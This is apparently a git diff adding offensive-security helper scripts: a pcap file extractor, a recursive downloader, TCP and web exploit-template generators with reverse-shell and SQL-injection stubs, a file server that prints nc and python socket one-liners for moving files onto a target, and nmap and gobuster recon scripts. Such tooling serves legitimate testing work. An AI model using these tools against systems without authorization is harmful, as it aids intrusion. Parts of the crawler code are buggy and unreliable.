|
||||
def _format_key(sock_a, sock_b):
|
||||
return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"
|
||||
|
||||
def get_connection(self, sock_a, sock_b):
|
||||
key = self._format_key(sock_a, sock_b)
|
||||
return self.connections[key]
|
||||
|
||||
def add_packet(self, sock_src, sock_dst, packet):
|
||||
key = self._format_key(sock_src, sock_dst)
|
||||
if key not in self.connections:
|
||||
self.connections[key] = TcpConnection(sock_src, sock_dst)
|
||||
|
||||
self.connections[key].add_packet(packet)
|
||||
return self.connections[key]
|
||||
|
||||
|
||||
class PcapExtractor:
|
||||
def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
|
||||
self.pcap_path = pcap_path
|
||||
self.output_dir = output_dir
|
||||
self.filters = filters if filters is not None else []
|
||||
self._packets = None
|
||||
|
||||
def _open_file(self):
|
||||
self._packets = rdpcap(self.pcap_path)
|
||||
|
||||
def extract_all(self):
|
||||
self._open_file()
|
||||
http_packets = self._parse_http_packets()
|
||||
filtered_packets = self._apply_filters(http_packets)
|
||||
for packet in filtered_packets:
|
||||
if len(packet.payload) > 0:
|
||||
file_path = packet.get_file_path()
|
||||
with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
|
||||
f.write(packet.payload)
|
||||
|
||||
print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")
|
||||
|
||||
def __iter__(self):
|
||||
self._open_file()
|
||||
http_packets = self._parse_http_packets()
|
||||
self.iter_filtered_packets = self._apply_filters(http_packets)
|
||||
return iter(self.iter_filtered_packets)
|
||||
|
||||
def __next__(self):
|
||||
return next(self.iter_filtered_packets)
|
||||
|
||||
def _apply_filters(self, packets):
|
||||
filtered_packets = packets
|
||||
for f in self.filters:
|
||||
filtered_packets = filter(f, filtered_packets)
|
||||
return list(filtered_packets)
|
||||
|
||||
def list(self):
|
||||
self._open_file()
|
||||
http_packets = self._parse_http_packets()
|
||||
filtered_packets = self._apply_filters(http_packets)
|
||||
for packet in filtered_packets:
|
||||
print(packet)
|
||||
|
||||
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
|
||||
http_buffer = raw(initial_packet[TCP].payload)
|
||||
prev_seq = initial_packet[TCP].seq
|
||||
buff = None
|
||||
while packet_iterator.has_more():
|
||||
next_packet = packet_iterator.peek()
|
||||
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
|
||||
next_packet = packet_iterator.pop()
|
||||
|
||||
if buff is not None:
|
||||
# if there is a buffered package, and the seq. number was not reused
|
||||
if buff[0] != next_packet[TCP].seq:
|
||||
# append this to output
|
||||
http_buffer += buff[1]
|
||||
buff = None
|
||||
|
||||
payload_len = len(next_packet[TCP].payload)
|
||||
if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
|
||||
buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
|
||||
# potential TCP ZeroWindowProbe
|
||||
continue
|
||||
|
||||
# TODO: instead of assertions, we should make sure, the seq. is ascending
|
||||
assert next_packet[TCP].seq > prev_seq
|
||||
assert next_packet[IP].frag == 0
|
||||
http_buffer += raw(next_packet[TCP].payload)
|
||||
prev_seq = next_packet[TCP].seq
|
||||
else:
|
||||
break
|
||||
|
||||
return HttpPacket.parse(sock_src, http_buffer)
|
||||
|
||||
def _parse_http_packets(self):
|
||||
|
||||
connections = TcpConnections()
|
||||
for packet in self._packets:
|
||||
if TCP not in packet:
|
||||
continue
|
||||
|
||||
ip_hdr = packet[IP]
|
||||
tcp_packet = packet[TCP]
|
||||
if len(tcp_packet.payload) == 0:
|
||||
continue
|
||||
|
||||
sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
|
||||
sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
|
||||
connections.add_packet(sock_src, sock_dst, packet)
|
||||
|
||||
http_packets = []
|
||||
for connection in connections:
|
||||
packet_iterator = connection.iterator()
|
||||
while packet_iterator.has_more():
|
||||
request = packet_iterator.find_packet(HttpRequest.PATTERN)
|
||||
if not request:
|
||||
continue
|
||||
|
||||
packet, match, sock_src = request
|
||||
method = match[0].decode()
|
||||
file_name = match[1].decode().rsplit("?")[0]
|
||||
http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
|
||||
http_packets.append(http_request_packet)
|
||||
|
||||
other_sock = connection.get_other_sock(sock_src)
|
||||
response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
|
||||
if not response:
|
||||
continue
|
||||
|
||||
packet, match, sock_src = response
|
||||
status_code = match[1].decode()
|
||||
http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
|
||||
http_response_packet.response_to = http_request_packet
|
||||
http_packets.append(http_response_packet)
|
||||
|
||||
return http_packets
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("file", help="Path to pcap file to extract files from")
|
||||
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
|
||||
dest="output_dir")
|
||||
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
|
||||
parser.add_argument("-e", "--extract", help="Extract files (default)", default=False, action="store_true")
|
||||
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
|
||||
default="101,304,403,404", dest="exclude_codes")
|
||||
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
|
||||
default="", dest="include_codes")
|
||||
parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
|
||||
default="", dest="file_extensions")
|
||||
parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
|
||||
default="", dest="file_name")
|
||||
parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
|
||||
default="", dest="file_path")
|
||||
# TODO: ports, ip_addresses...
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
filters = [
|
||||
lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
|
||||
]
|
||||
|
||||
if args.include_codes:
|
||||
filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])
|
||||
|
||||
if args.file_extensions:
|
||||
filters.append(lambda p: os.path.splitext(p.file_name)[1] in args.file_extensions.split(","))
|
||||
|
||||
if args.file_name:
|
||||
filters.append(lambda p: os.path.basename(p.get_file_path()) == args.file_name)
|
||||
|
||||
if args.file_path:
|
||||
filters.append(lambda p: p.get_file_path() == args.file_path)
|
||||
|
||||
pcap_path = args.file
|
||||
if not os.path.isfile(pcap_path):
|
||||
print("[-] File not found or not a file:", pcap_path)
|
||||
exit(1)
|
||||
|
||||
output_dir = args.output_dir
|
||||
if not os.path.isdir(output_dir):
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
if not os.path.isdir(output_dir):
|
||||
print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
|
||||
exit(2)
|
||||
|
||||
pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
|
||||
if args.list and args.extract:
|
||||
print("[-] Can only specify one of list or extract, not both")
|
||||
exit(3)
|
||||
elif args.list:
|
||||
pcap_extractor.list()
|
||||
else:
|
||||
pcap_extractor.extract_all()
|
||||
78
tools/misc/recursive_download.py
Executable file
78
tools/misc/recursive_download.py
Executable file
@@ -0,0 +1,78 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
import argparse
|
||||
import urllib
|
||||
import requests
|
||||
import os
|
||||
import pathlib
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
def download_files(url, root_directory, wordlist, verbose=False):
|
||||
root_directory = str(pathlib.Path(root_directory).resolve())
|
||||
for w in wordlist:
|
||||
rel_directory = os.path.dirname(w)
|
||||
dest_directory = os.path.join(root_directory, rel_directory)
|
||||
if not str(pathlib.Path(dest_directory).resolve()).startswith(root_directory):
|
||||
print("[!] Path outside the root directory:", w)
|
||||
continue
|
||||
|
||||
res = requests.get(url + w, verify=False, allow_redirects=False)
|
||||
if res.status_code == 200:
|
||||
if not os.path.isdir(dest_directory):
|
||||
os.makedirs(dest_directory, exist_ok=True)
|
||||
with open(os.path.join(root_directory, w), "wb") as f:
|
||||
f.write(res.content)
|
||||
print(f"[+] {url}{w}: {len(res.content)} Bytes")
|
||||
elif verbose:
|
||||
print(f"[-] {url}{w}: {res.status_code} {res.reason}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument(
|
||||
dest="dir",
|
||||
help="The destination directory"
|
||||
)
|
||||
parser.add_argument(
|
||||
dest="url",
|
||||
help="The URL prefix"
|
||||
)
|
||||
parser.add_argument(
|
||||
dest="wordlist",
|
||||
help="The wordlist containing all uris"
|
||||
)
|
||||
parser.add_argument(
|
||||
"-v", "--verbose",
|
||||
action="store_true",
|
||||
help="Verbose mode",
|
||||
default=False
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
uris = set()
|
||||
with open(args.wordlist, "r") as f:
|
||||
for line in f:
|
||||
w = line.strip()
|
||||
while w.startswith("/"):
|
||||
w = w[1:]
|
||||
if w:
|
||||
uris.add(w)
|
||||
|
||||
if len(uris) == 0:
|
||||
print("[!] List does not contain any URIs")
|
||||
exit()
|
||||
|
||||
dest_directory = args.dir
|
||||
if not os.path.isdir(dest_directory):
|
||||
if not os.mkdir(dest_directory):
|
||||
print("[!] Destination directory does not exist and could not be created")
|
||||
exit()
|
||||
|
||||
url = args.url
|
||||
if not url.endswith("/"):
|
||||
url += "/"
|
||||
|
||||
download_files(url, dest_directory, uris, args.verbose)
|
||||
|
||||
118
tools/misc/tcp_template.py
Normal file
118
tools/misc/tcp_template.py
Normal file
@@ -0,0 +1,118 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import argparse
|
||||
import urllib.parse
|
||||
|
||||
def generate_template(listen_address, listen_port, remote_host, remote_port):
|
||||
|
||||
# we could all need that
|
||||
imports = [
|
||||
"os",
|
||||
"socket",
|
||||
"threading"
|
||||
]
|
||||
|
||||
partial_imports = {
|
||||
"hackingscripts.utils": ["util"],
|
||||
"hackingscripts.utils.packeter": ["Packer", "Parser"]
|
||||
}
|
||||
|
||||
imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
|
||||
imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
|
||||
return f"""#!/usr/bin/env python
|
||||
|
||||
#
|
||||
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
|
||||
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
|
||||
#
|
||||
|
||||
{imports}
|
||||
|
||||
BUFFER_SIZE = 4096
|
||||
|
||||
class Packet:
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
@staticmethod
|
||||
def from_data(data):
|
||||
packet = Packet()
|
||||
parser = Parser(data)
|
||||
# TODO: auto-generated method stub
|
||||
return packet
|
||||
|
||||
def pack(self):
|
||||
buf = Packer()
|
||||
# TODO: auto-generated method stub
|
||||
return buf.get()
|
||||
|
||||
def forward(source, destination):
|
||||
try:
|
||||
while True:
|
||||
data = source.recv(BUFFER_SIZE)
|
||||
if not data:
|
||||
break
|
||||
|
||||
# TODO: Parse / Manipulate packet
|
||||
# packet = Packet.from_data(data)
|
||||
# repacked = packet.pack()
|
||||
|
||||
destination.sendall(data)
|
||||
except Exception:
|
||||
pass
|
||||
finally:
|
||||
source.close()
|
||||
destination.close()
|
||||
|
||||
def handle_client(client_socket, remote_host, remote_port):
|
||||
try:
|
||||
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
remote_socket.connect((remote_host, remote_port))
|
||||
except Exception as e:
|
||||
print(f"Failed to connect to remote: {{e}}")
|
||||
client_socket.close()
|
||||
return
|
||||
|
||||
# Start bidirectional forwarding
|
||||
threading.Thread(target=forward, args=(client_socket, remote_socket), daemon=True).start()
|
||||
threading.Thread(target=forward, args=(remote_socket, client_socket), daemon=True).start()
|
||||
|
||||
def start_proxy(local_host, local_port, remote_host, remote_port):
|
||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
server.bind((local_host, local_port))
|
||||
server.listen(100)
|
||||
|
||||
print(f"[*] Forwarding from {{local_host}}:{{local_port}} to {{remote_host}}:{{remote_port}}")
|
||||
|
||||
while True:
|
||||
client_socket, addr = server.accept()
|
||||
print(f"[+] Connection from {{addr[0]}}:{{addr[1]}}")
|
||||
threading.Thread(
|
||||
target=handle_client,
|
||||
args=(client_socket, remote_host, remote_port),
|
||||
daemon=True
|
||||
).start()
|
||||
|
||||
if __name__ == "__main__":
|
||||
start_proxy({repr(listen_address)}, {listen_port}, {repr(remote_host)}, {remote_port})
|
||||
"""
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Exploit Template for tcp application attacks",
|
||||
formatter_class=argparse.RawTextHelpFormatter
|
||||
)
|
||||
|
||||
parser.add_argument("la", type=str, help="Listen Address")
|
||||
parser.add_argument("lp", type=int, help="Listen Port", choices=range(1,65535+1))
|
||||
parser.add_argument("rh", type=str, help="Remote Host")
|
||||
parser.add_argument("rp", type=int, help="Remote Port", choices=range(1,65535+1))
|
||||
|
||||
args = parser.parse_args()
|
||||
template = generate_template(args.la, args.lp, args.rh, args.rp)
|
||||
print(template)
|
||||
53
tools/misc/upload_file.py
Executable file
53
tools/misc/upload_file.py
Executable file
@@ -0,0 +1,53 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import sys
|
||||
import os
|
||||
import argparse
|
||||
|
||||
from hackingscripts.utils import util
|
||||
|
||||
def serve_file(listen_sock, path, forever=False):
|
||||
try:
|
||||
while True:
|
||||
print('[ ] Waiting for a connection')
|
||||
connection, client_address = listen_sock.accept()
|
||||
|
||||
try:
|
||||
print('[+] Connection from', client_address)
|
||||
|
||||
with open(path, "rb") as f:
|
||||
content = f.read()
|
||||
connection.sendall(content)
|
||||
|
||||
print("[+] File Transfer succeeded")
|
||||
finally:
|
||||
connection.close()
|
||||
|
||||
if not forever:
|
||||
break
|
||||
finally:
|
||||
listen_sock.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
parser = argparse.ArgumentParser(description="File Transfer using netcat")
|
||||
parser.add_argument("--port", type=int, required=False, default=None, help="Listening port")
|
||||
parser.add_argument(type=str, dest="path", help="Path to the file you wish to upload")
|
||||
args = parser.parse_args()
|
||||
|
||||
path = args.path
|
||||
if not os.path.isfile(path):
|
||||
print("[-] File not found:", path)
|
||||
exit(1)
|
||||
|
||||
address = util.get_address()
|
||||
listen_sock = util.open_server(address, args.port)
|
||||
if not listen_sock:
|
||||
exit(1)
|
||||
|
||||
print("[+] Now listening, download file using:")
|
||||
print('nc %s %d > %s' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
|
||||
print('python -c \'import socket;sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0);sock.connect(("%s",%d));sock.sendall(open("%s","rb").read())\'' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
|
||||
print()
|
||||
|
||||
serve_file(listen_sock, path, forever=True)
|
||||
209
tools/misc/web_template.py
Executable file
209
tools/misc/web_template.py
Executable file
@@ -0,0 +1,209 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import argparse
|
||||
import urllib.parse
|
||||
|
||||
def generate_template(base_url, features):
|
||||
|
||||
# we could all need that
|
||||
imports = [
|
||||
"os", "io", "re", "sys",
|
||||
"json", "time", "base64", "requests",
|
||||
"subprocess", "urllib.parse"
|
||||
]
|
||||
|
||||
partial_imports = {
|
||||
"bs4": ["BeautifulSoup"],
|
||||
"hackingscripts.utils": ["util"],
|
||||
"hackingscripts.tools.exploits": ["rev_shell"],
|
||||
"urllib3.exceptions": ["InsecureRequestWarning"]
|
||||
}
|
||||
|
||||
main_code = []
|
||||
methods = []
|
||||
ip_address_arg = next(filter(lambda f: re.match(r"ip_address=(.*)", f), features), None)
|
||||
ip_address = "util.get_address()" if not ip_address_arg else "'" + ip_address_arg[1] + "'"
|
||||
|
||||
variables = {
|
||||
"IP_ADDRESS": ip_address,
|
||||
"BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
|
||||
}
|
||||
|
||||
proxy_arg = next(filter(lambda f: re.match(r"proxy=(.*)", f), features), None)
|
||||
if proxy_arg or "burp" in features:
|
||||
proxy_url = "http://127.0.0.1:8080" if not proxy_arg else proxy_arg[1]
|
||||
variables["PROXIES"] = json.dumps({"http": proxy_url, "https": proxy_url})
|
||||
proxy = """
|
||||
if \"proxies\" not in kwargs:
|
||||
kwargs[\"proxies\"] = PROXIES
|
||||
"""
|
||||
else:
|
||||
proxy = ""
|
||||
|
||||
if "vhost" in features or "subdomain" in features:
|
||||
url_parts = urllib.parse.urlparse(base_url)
|
||||
host_name = url_parts.netloc
|
||||
variables["HOST_NAME"] = f"'{host_name}' if \"LOCAL\" not in sys.argv else \"127.0.0.1:1337\""
|
||||
vhost_param = ", vhost=None"
|
||||
full_url = f"f'{url_parts.scheme}://{{vhost}}.{{HOST_NAME}}{{uri}}' if vhost else BASE_URL + uri"
|
||||
else:
|
||||
vhost_param = ""
|
||||
full_url = "BASE_URL + uri"
|
||||
|
||||
methods.insert(0, f"""def request(method, uri{vhost_param}, **kwargs):
|
||||
if not uri.startswith("/") and uri != "":
|
||||
uri = "/" + uri
|
||||
|
||||
client = requests
|
||||
if "session" in kwargs:
|
||||
client = kwargs["session"]
|
||||
del kwargs["session"]
|
||||
|
||||
if "allow_redirects" not in kwargs:
|
||||
kwargs["allow_redirects"] = False
|
||||
|
||||
if "verify" not in kwargs:
|
||||
kwargs["verify"] = False
|
||||
{proxy}
|
||||
url = {full_url}
|
||||
return client.request(method, url, **kwargs)
|
||||
""")
|
||||
|
||||
if "register" in features or "account" in features:
|
||||
main_code.append("""if not register(USERNAME, PASSWORD):
|
||||
exit(1)
|
||||
""")
|
||||
variables["USERNAME"] = '"Blindhero"'
|
||||
variables["PASSWORD"] = '"test1234"'
|
||||
methods.append("""
|
||||
def register(username, password):
|
||||
res = request("POST", "/register", data={"username": username, "password": password})
|
||||
if res.status_code != 200:
|
||||
print("[-] Error registering")
|
||||
exit()
|
||||
|
||||
return True
|
||||
""")
|
||||
|
||||
if "login" in features or "account" in features:
|
||||
main_code.append("""session = login(USERNAME, PASSWORD)
|
||||
if not session:
|
||||
exit(1)
|
||||
""")
|
||||
variables["USERNAME"] = '"username"'
|
||||
variables["PASSWORD"] = '"password"'
|
||||
methods.append("""
|
||||
def login(username, password):
|
||||
session = requests.Session()
|
||||
res = request("POST", "/login", data={"username": username, "password": password}, session=session)
|
||||
if res.status_code != 200:
|
||||
print("[-] Error logging in")
|
||||
exit()
|
||||
|
||||
return session
|
||||
""")
|
||||
|
||||
if "sqli" in features:
|
||||
partial_imports["hackingscripts.sqli"] = ["MySQLi", "PostgreSQLi", "BlindSQLi", "ReflectedSQLi"]
|
||||
methods.append("""
|
||||
class ReflectedSQLiPoC(MySQLi, ReflectedSQLi):
|
||||
def __init__(self):
|
||||
# TODO: specify reflected columns with their types
|
||||
super().__init__([None, str, int])
|
||||
def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
|
||||
# TODO: build query and extract columns from response
|
||||
return None
|
||||
""")
|
||||
methods.append("""
|
||||
class BlindSQLiPoC(MySQLi, BlindSQLi):
|
||||
def blind_sqli(self, condition: str, verbose=False) -> bool:
|
||||
# TODO: build query and evaluate condition
|
||||
return False
|
||||
""")
|
||||
|
||||
main_code.append("""poc = ReflectedSQLiPoC()
|
||||
print(poc.get_current_user())
|
||||
""")
|
||||
|
||||
if "http-server" in features or "file-server" in features:
|
||||
partial_imports["hackingscripts.fileserver"] = ["HttpFileServer"]
|
||||
main_code.append("""file_server = HttpFileServer("0.0.0.0", 3000)
|
||||
file_server.enableLogging()
|
||||
file_server.addRoute("/dynamic", on_request)
|
||||
file_server.addFile("/static", b"static-content")
|
||||
file_server.startBackground()
|
||||
""")
|
||||
|
||||
methods.append("""
|
||||
def on_request(req):
|
||||
# TODO: auto generated method stub
|
||||
return 200, b"", { "X-Custom-Header": "1" }
|
||||
""")
|
||||
|
||||
if len(main_code) == 0:
|
||||
main_code = ["pass"]
|
||||
|
||||
main = f"""
|
||||
if __name__ == "__main__":
|
||||
{'\n '.join(main_code)}
|
||||
"""
|
||||
|
||||
imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
|
||||
imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
|
||||
variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
|
||||
header = f"""#!/usr/bin/env python
|
||||
|
||||
#
|
||||
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
|
||||
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
|
||||
#
|
||||
|
||||
{imports}
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
{variables}
|
||||
|
||||
"""
|
||||
|
||||
return header + "".join(methods) + main
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Exploit Template for web attacks",
|
||||
formatter_class=argparse.RawTextHelpFormatter
|
||||
)
|
||||
|
||||
available_features = [
|
||||
"ip_address=[...]: Local IP-Address for reverse connections",
|
||||
"burp|proxy=[...]: Tunnel traffic through a given proxy or Burp defaults",
|
||||
"subdomain|vhost: Allow to specify a subdomain for outgoing requests",
|
||||
"register|account: Generate an account registration method stub",
|
||||
"login|account: Generate an account login method stub",
|
||||
"sqli: Generate an template SQL-Injection class",
|
||||
"http-server|file-server: Generate code for starting an in-memory http server"
|
||||
]
|
||||
|
||||
parser.add_argument("url", type=str, help="Target URL")
|
||||
parser.add_argument(
|
||||
"-f",
|
||||
"--features",
|
||||
nargs="*",
|
||||
type=str,
|
||||
default=[],
|
||||
help="Optional list of features:\n- " + "\n- ".join(available_features)
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
url = args.url
|
||||
if "://" not in url:
|
||||
url = "http://" + url
|
||||
|
||||
features = args.features
|
||||
template = generate_template(url, features)
|
||||
print(template)
|
||||
|
||||
136
tools/scanner/crawl_urls.py
Executable file
136
tools/scanner/crawl_urls.py
Executable file
@@ -0,0 +1,136 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import urllib.parse
|
||||
import urllib3
|
||||
import requests
|
||||
import queue
|
||||
import re
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
|
||||
class Crawler:
|
||||
|
||||
def __init__(self, url):
|
||||
self.url = url
|
||||
|
||||
parts = urllib.parse.urlparse(url)
|
||||
if not parts.scheme and not parts.netloc and parts.path:
|
||||
self.domain = parts.path
|
||||
self.url = parts._replace(scheme="http", netloc=parts.path, path="").geturl()
|
||||
self.scheme = "http"
|
||||
else:
|
||||
self.domain = parts.netloc
|
||||
self.scheme = "http" if not parts.scheme else parts.scheme
|
||||
|
||||
self.user_agent = "WebCrawler/1.0"
|
||||
self.cookies = {}
|
||||
self.proxy = None
|
||||
|
||||
#
|
||||
self.queue = queue.Queue()
|
||||
self.visited = set()
|
||||
self.out_of_scope = set()
|
||||
self.resources = set()
|
||||
self.pages = set()
|
||||
|
||||
def request(self, url):
|
||||
headers = {"User-Agent": self.user_agent}
|
||||
kwargs = {"verify": False, "cookies": self.cookies, "headers": headers}
|
||||
if self.proxy:
|
||||
kwargs["proxy"] = {
|
||||
"http": self.proxy,
|
||||
"https": self.proxy
|
||||
}
|
||||
|
||||
print("requesting:", url)
|
||||
return requests.get(url, **kwargs)
|
||||
|
||||
def start(self):
|
||||
|
||||
self.queue.put(self.url)
|
||||
while not self.queue.empty():
|
||||
url = self.queue.get()
|
||||
if url in self.visited:
|
||||
continue
|
||||
|
||||
self.visited.add(url)
|
||||
res = self.request(url)
|
||||
content_type = res.headers.get("Content-Type", None)
|
||||
if "text/html" not in content_type.lower().split(";"):
|
||||
continue
|
||||
|
||||
urls = self.collect_urls(res.text)
|
||||
for url in urls:
|
||||
parts = urllib.parse.urlparse(url)
|
||||
if parts.netloc and parts.netloc != self.domain:
|
||||
self.out_of_scope.add(url)
|
||||
else:
|
||||
resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js", "svg", "ico"]
|
||||
path, args = parts.path, None
|
||||
if "?" in path:
|
||||
path = path[0:path.index("?")]
|
||||
args = urllib.parse.parse_args(path[path.index("?") + 1:])
|
||||
if path.rsplit(".", 1)[-1] in resources_ext:
|
||||
self.resources.add(url)
|
||||
else:
|
||||
self.pages.add(url)
|
||||
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme, fragment="").geturl())
|
||||
|
||||
@staticmethod
|
||||
def collect_urls(page):
|
||||
if not isinstance(page, BeautifulSoup):
|
||||
page = BeautifulSoup(page, "html.parser")
|
||||
|
||||
urls = set()
|
||||
attrs = ["src", "href", "action"]
|
||||
tags = ["a", "link", "script", "img", "form"]
|
||||
|
||||
for tag in tags:
|
||||
for e in page.find_all(tag):
|
||||
for attr in attrs:
|
||||
if e.has_attr(attr):
|
||||
urls.add(e[attr])
|
||||
|
||||
return urls
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("url", help="The target URI to scan to, e.g. http://example.com:8080/dir/")
|
||||
parser.add_argument("--proxy", help="Proxy to connect through") # TODO
|
||||
parser.add_argument("--user-agent", help="User-Agent to use")
|
||||
parser.add_argument("--cookie", help="Cookies to send", action='append', default=[])
|
||||
parser.add_argument('--verbose', '-v', help="Verbose otuput", action='store_true')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
crawler = Crawler(args.url)
|
||||
if args.user_agent:
|
||||
crawler.user_agent = args.user_agent
|
||||
if args.proxy:
|
||||
crawler.proxy = args.proxy
|
||||
|
||||
cookie_pattern = re.compile("^([a-zA-Z0-9.%/+_-]+)=([a-zA-Z0-9.%/+_-])*$")
|
||||
for cookie in crawler.cookies:
|
||||
m = cookie_pattern.match(cookie)
|
||||
if not m:
|
||||
print("[-] Cookie does not match pattern:", cookie)
|
||||
print("[-] You might need to URL-encode it")
|
||||
exit()
|
||||
key, value = (urllib.parse.unquoute(m[1]), urllib.parse.unquoute(m[2]))
|
||||
crawler.cookies[key] = value
|
||||
|
||||
crawler.start()
|
||||
|
||||
results = {
|
||||
"Pages": crawler.pages,
|
||||
"Resources": crawler.resources,
|
||||
"Out of Scope": crawler.out_of_scope
|
||||
}
|
||||
|
||||
for name, values in results.items():
|
||||
print(f"=== {name} ===")
|
||||
print("\n".join(values))
|
||||
33
tools/scanner/first_scan.sh
Executable file
33
tools/scanner/first_scan.sh
Executable file
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/bash
|
||||
|
||||
if [ $# -lt 1 ]; then
|
||||
echo "Invalid usage: $0 <host>"
|
||||
exit
|
||||
fi
|
||||
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
echo "[-] Script requires root permissions (e.g. nmap scan)"
|
||||
exit
|
||||
fi
|
||||
|
||||
IP_ADDRESS=$1
|
||||
|
||||
echo "[+] Checking online status…"
|
||||
ping -c1 -W1 -q "${IP_ADDRESS}" &>/dev/null
|
||||
status=$(echo $?)
|
||||
|
||||
if ! [[ $status == 0 ]] ; then
|
||||
echo "[-] Target not reachable"
|
||||
exit
|
||||
fi
|
||||
|
||||
echo "[+] Scanning for open ports…"
|
||||
PORTS=$(nmap -p- -T4 ${IP_ADDRESS} | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
|
||||
if [ -z "${PORTS}" ]; then
|
||||
echo "[-] No open ports found"
|
||||
exit
|
||||
fi
|
||||
|
||||
echo "[+] Open ports: ${PORTS}"
|
||||
echo "[+] Performing service scans…"
|
||||
nmap -A "${IP_ADDRESS}" -p$PORTS -T4 -v
|
||||
13
tools/scanner/gobuster.sh
Executable file
13
tools/scanner/gobuster.sh
Executable file
@@ -0,0 +1,13 @@
|
||||
#!/usr/bin/bash
|
||||
|
||||
if [ $# -lt 1 ]; then
|
||||
echo "Invalid usage: $0 <host>"
|
||||
exit
|
||||
fi
|
||||
|
||||
HOST=$1
|
||||
(set -x; gobuster dir \
|
||||
--url="${HOST}" \
|
||||
--wordlist="/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words-lowercase.txt" \
|
||||
-b "403,404" -k \
|
||||
"${@:2}")
|
||||
33
tools/scanner/phpinfo-analyzer.py
Executable file
33
tools/scanner/phpinfo-analyzer.py
Executable file
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
def analyze(soup):
|
||||
tables = soup.find_all("table")
|
||||
for table in tables:
|
||||
thead = table.find("tr", { "class": "h" })
|
||||
if not thead or len(thead.find_all("th")) != 3:
|
||||
continue
|
||||
|
||||
for tr in table.find_all("tr"):
|
||||
tds = tr.find_all("td")
|
||||
if len(tds) != 3:
|
||||
continue
|
||||
|
||||
label, local, master = tds
|
||||
if local.text != master.text:
|
||||
